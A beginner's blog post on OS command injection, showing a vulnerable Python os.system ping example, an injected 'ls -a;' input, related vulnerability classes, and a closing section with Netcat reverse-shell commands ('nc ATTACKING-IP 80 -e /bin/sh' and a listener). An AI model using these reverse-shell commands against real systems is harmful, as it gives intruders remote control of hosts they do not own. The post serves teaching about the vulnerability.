Command execution: OWASP top vulnerability

0xdom
Nerd For Tech
Published in
4 min readApr 25, 2021

--

src

what is command execution?

The Command injection is also known as OS command injection is a way of exploiting system applications with running external OS commands by obtaining the shell which can be caused by poor sanitization or validation of the user input. And which might lead to the execution of arbitrary command execution on the target system. This may also lead to the compromisation of the whole database by an attacker which may include the user's personal information.

the attacker can request, delete, add, edit the information (eg. XML config files)from the compromised system or may even inject a backdoor into the system so he can access it later.

The chances of finding this vulnerability increases when the developer uses system() or equivalent commands in its source code.

import osdomain = user_input() #enter the website to trace
os.system('ping'+ domain) #counts the hops to domain

the above code will ping the domain entered by the user. But you may notice the user input is not being filtered before passing to the system() which executes the command on the system.

so what if the user decided to enter the input which is not expected by the developer in this case eg.

import osdomain = user_input() #ls -a;
os.system('ping'+ domain) #counts the hops to domain

in this case, the domain variable will store the command ‘ls -a ;’ in it, and the preceding command is terminated by ‘;’ allowing you to put another command.

ls -a ; ping

so here system will execute the ‘ls -a’ command and the ‘ping’ command with no attribute. you can also include other commands instead of ls -a.

But you might be thinking about,

Why do the applications need to execute the system commands?

well, obviously because the application needs to communicate with the system for its internal functions or it might want to run the other applications or might want to run the programs written in other programming languages.

so it concludes how useful it is to make system() calls, it is a very useful feature unless it's used legitimately.

command injection

ok so it ain't a problem for the user but this can open a whole lot of opportunities for the attacker, the worst thing that could happen is the attacker can spawn a reverse shell and execute the command injection attack on the webserver(target system). And to add up to this scenario we have a whole bunch of reverse shells to use you can get them from here.

methods

the following are the different types of command injection attacks that are caused by the same vulnerabilities.

Arbitrary command injection

poor sanitization or validation of user input can lead to this vuln. here attackers can inject malicious commands into the system.

Arbitrary file uploads

a website that allows file upload without validating the extension or data in the file can lead to exploitation by this vulnerability, this type of exploitation may fall in the category of code injection where the malicious chunk of code is uploaded.

Insecure serialization

every communication needs serialization and deserialization of data but if the deserialization(server-side) of data occurs without any proper verification it can result in command execution.

Server-side template injection (SSTI)

This vulnerability allows attackers to insert malicious server-side template which is used by many server-side applications to generate the valid HTML response.

XML external entity injection (XXE)

XXE is an attack vulnerability that abuses the feature of XML parsers/data. It can lead to exposure of sensitive data, server-side request forgery(SSRF), or denial of service attack.

attacking

In this article, we’re going to focus on Netcat reverse shell.

A reverse shell is a shell initiated from the target machine back to the attacker host which is in a listening state to pick up the shell. The bind shell is set up on the target host (in this case by injection) with a specific port which will then initiate the connection to the attacker’s device, hence establishing the connection. the reverse shell can also be referred to as a backdoor (exactly as it sounds like).

steps:

  1. setting up the listener on the attacker's device.
  2. initiate the connection from the target device.
  3. issue commands and enjoy your reverse shell.

you should set up the listener first as shown below.

nc -lvp 80

next step we execute the following command to initiate the connection on the target host with the help of the following command.

nc ATTACKING-IP 80 -e /bin/sh

if this doesn’t work then

/bin/sh | nc ATTACKING-IP 80

there is a whole collection of reverse shells here, so just don’t limit yourself with Netcat try new shells too.

--

--

0xdom
Nerd For Tech

I'm a cybersecurity aspirant currently working on my skills, wannabe hacker.